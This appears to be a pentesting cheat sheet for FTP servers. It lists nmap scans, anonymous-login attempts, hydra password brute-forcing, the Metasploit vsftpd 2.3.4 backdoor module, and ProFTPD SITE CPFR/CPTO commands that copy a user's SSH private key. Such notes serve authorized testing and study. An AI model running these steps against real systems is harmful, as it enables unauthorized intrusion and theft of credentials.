Skip to content

21 - Pentesting ftp

Nmap

sudo nmap -p 21 -A $IP
nmap -p 21 --script=ftp-* $IP
nmap -p 21 --script=ftp-anon.nse $IP

Anonymous login

lftp $IP
ftp $IP
> anonymous
> anonymous

ftp $IP
> anonymous
> password

Bruteforce

hydra

hydra -C /usr/share/wordlists/seclists/Passwords/Default-Credentials/ftp-betterdefaultpasslist.txt $IP ftp
hydra
hydra -l admin -P /usr/share/wordlists/rockyou.txt ftp://$IP -I

Exploit

ProFtpd

sudo nmap -p21 --script-help=ftp-proftpd-backdoor.nse
searchsploit proftpd 1.3.5

VsFtpd 2.3.4

sudo nmap -p21 --script-help=ftp-vsftpd-backdoor
searchsploit vsftpd 2.3.4
msf> use exploit/unix/ftp/vsftpd\_234\_backdoor
msf> show options
msf> set RHOST 192.168.0.101
msf> show options
msf> exploit

Commands

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa
SITE CPTO /var/tmp/id_rsa

SITE CPFR /home/{TARGT_USER}/.ssh/id_rsa.pub
SITE CPTO /var/tmp/id_rsa.pub